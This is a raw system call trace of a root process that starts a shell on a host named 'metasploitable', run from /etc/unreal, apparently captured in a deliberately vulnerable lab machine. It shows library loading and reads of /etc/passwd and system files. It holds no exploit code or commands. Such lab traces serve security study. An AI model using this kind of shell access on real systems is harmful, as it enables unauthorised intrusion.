11138 20:13:42.037118 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5b000
11138 20:13:42.037131 mmap2(0xb7f88000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f88000
11138 20:13:42.037148 close(1)          = 0
11138 20:13:42.037160 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11138 20:13:42.037174 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
11138 20:13:42.037188 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
11138 20:13:42.037284 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
11138 20:13:42.037301 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f57000
11138 20:13:42.037313 mmap2(0xb7f59000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f59000
11138 20:13:42.037329 close(1)          = 0
11138 20:13:42.037340 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11138 20:13:42.037355 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
11138 20:13:42.037369 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
11138 20:13:42.037458 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
11138 20:13:42.037475 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f56000
11138 20:13:42.037489 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e07000
11138 20:13:42.037500 mmap2(0xb7f50000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f50000
11138 20:13:42.037515 mmap2(0xb7f53000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f53000
11138 20:13:42.037529 close(1)          = 0
11138 20:13:42.037551 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e06000
11138 20:13:42.037563 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e066b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
11138 20:13:42.037668 mprotect(0xb7f50000, 4096, PROT_READ) = 0
11138 20:13:42.037705 munmap(0xb7f8b000, 29913) = 0
11138 20:13:42.037731 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11138 20:13:42.037745 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)
11138 20:13:42.037766 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd04ec0) = -1 ENOTTY (Inappropriate ioctl for device)
11138 20:13:42.037796 brk(0)            = 0x80f9000
11138 20:13:42.037806 brk(0x80fa000)    = 0x80fa000
11138 20:13:42.037817 brk(0x80fb000)    = 0x80fb000
11138 20:13:42.037834 getuid32()        = 0
11138 20:13:42.037843 getgid32()        = 0
11138 20:13:42.037852 geteuid32()       = 0
11138 20:13:42.037861 getegid32()       = 0
11138 20:13:42.037875 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11138 20:13:42.037889 time(NULL)        = 1495671222
11138 20:13:42.037902 brk(0x80fc000)    = 0x80fc000
11138 20:13:42.037916 brk(0x80fd000)    = 0x80fd000
11138 20:13:42.037935 open("/proc/meminfo", O_RDONLY) = 1
11138 20:13:42.037962 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
11138 20:13:42.037981 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f92000
11138 20:13:42.037996 read(1, "MemTotal:      1035240 kB\nMemFree:        174184 kB\nBuffers:        141164 kB\nCached:         474912 kB\nSwapCached:          0 kB\nActive:         495844 kB\nInactive:       310828 kB\nHighTotal:      131008 kB\nHighFree:          248 kB\nLowTotal:       904232 kB\nLowFree:        173936 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            1112 kB\nWriteback:           0 kB\nAnonPages:      190632 kB\nMapped:          52608 kB\nSlab:            32536 kB\nSReclaimable:    20132 kB\nSUnreclaim:      12404 kB\nPageTables:       2920 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   710184 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846
11138 20:13:42.038091 close(1)          = 0
11138 20:13:42.038103 munmap(0xb7f92000, 4096) = 0
11138 20:13:42.038115 brk(0x80fe000)    = 0x80fe000
11138 20:13:42.038142 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
11138 20:13:42.038156 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
11138 20:13:42.038168 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11138 20:13:42.038180 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11138 20:13:42.038193 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
11138 20:13:42.038205 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
11138 20:13:42.038218 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11138 20:13:42.038230 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11138 20:13:42.038244 uname({sys="Linux", node="metasploitable", ...}) = 0
11138 20:13:42.038292 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
11138 20:13:42.038311 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11138 20:13:42.038330 brk(0x8100000)    = 0x8100000
11138 20:13:42.038342 getcwd("/etc/unreal", 4096) = 12
11138 20:13:42.038356 getpid()          = 11138
11138 20:13:42.038373 getppid()         = 4519
11138 20:13:42.038388 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11138 20:13:42.038408 stat64("/sbin/sh", 0xbfd04e98) = -1 ENOENT (No such file or directory)
11138 20:13:42.038421 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
11138 20:13:42.038439 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
11138 20:13:42.038464 socket(PF_FILE, SOCK_STREAM, 0) = 1
11138 20:13:42.038477 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
11138 20:13:42.038489 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
11138 20:13:42.038511 close(1)          = 0
11138 20:13:42.038523 socket(PF_FILE, SOCK_STREAM, 0) = 1
11138 20:13:42.038533 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
11138 20:13:42.038544 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
11138 20:13:42.038571 close(1)          = 0
11138 20:13:42.038586 open("/etc/nsswitch.conf", O_RDONLY) = 1
11138 20:13:42.038601 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
11138 20:13:42.038618 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f92000
11138 20:13:42.038630 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
11138 20:13:42.038679 read(1, "", 4096) = 0
11138 20:13:42.038689 close(1)          = 0
11138 20:13:42.038698 munmap(0xb7f92000, 4096) = 0
11138 20:13:42.038715 open("/etc/ld.so.cache", O_RDONLY) = 1
11138 20:13:42.038728 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11138 20:13:42.038749 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8b000
11138 20:13:42.038759 close(1)          = 0
11138 20:13:42.038770 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11138 20:13:42.038785 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
11138 20:13:42.038801 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
11138 20:13:42.038891 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
11138 20:13:42.038908 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dfd000
11138 20:13:42.038920 mmap2(0xb7e04000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e04000
11138 20:13:42.038937 close(1)          = 0
11138 20:13:42.038949 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11138 20:13:42.038963 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
11138 20:13:42.038977 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
11138 20:13:42.039099 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
11138 20:13:42.039132 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de5000
11138 20:13:42.039144 mmap2(0xb7df9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7df9000
11138 20:13:42.039160 mmap2(0xb7dfb000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dfb000
11138 20:13:42.039174 close(1)          = 0
11138 20:13:42.039200 munmap(0xb7f8b000, 29913) = 0
11138 20:13:42.039217 open("/etc/ld.so.cache", O_RDONLY) = 1
11138 20:13:42.039230 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11138 20:13:42.039247 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8b000
11138 20:13:42.039257 close(1)          = 0
11138 20:13:42.039268 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11138 20:13:42.039283 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
11138 20:13:42.039300 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
11138 20:13:42.039390 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
11138 20:13:42.039407 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ddb000
11138 20:13:42.039419 mmap2(0xb7de3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7de3000
11138 20:13:42.039435 close(1)          = 0
11138 20:13:42.039448 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11138 20:13:42.039461 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
11138 20:13:42.039476 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
11138 20:13:42.039573 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
11138 20:13:42.039592 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd0000
11138 20:13:42.039604 mmap2(0xb7dd9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dd9000
11138 20:13:42.039621 close(1)          = 0
11138 20:13:42.039643 munmap(0xb7f8b000, 29913) = 0
11138 20:13:42.039659 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
11138 20:13:42.039673 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
11138 20:13:42.039685 _llseek(1, 0, [0], SEEK_CUR) = 0
11138 20:13:42.039697 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
11138 20:13:42.039714 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f92000
11138 20:13:42.039725 _llseek(1, 1624, [1624], SEEK_SET) = 0
11138 20:13:42.039740 munmap(0xb7f92000, 1624) = 0
11138 20:13:42.039750 close(1)          = 0
11138 20:13:42.039780 getpgrp()         = 3831
11138 20:13:42.039790 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
11138 20:13:42.039806 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
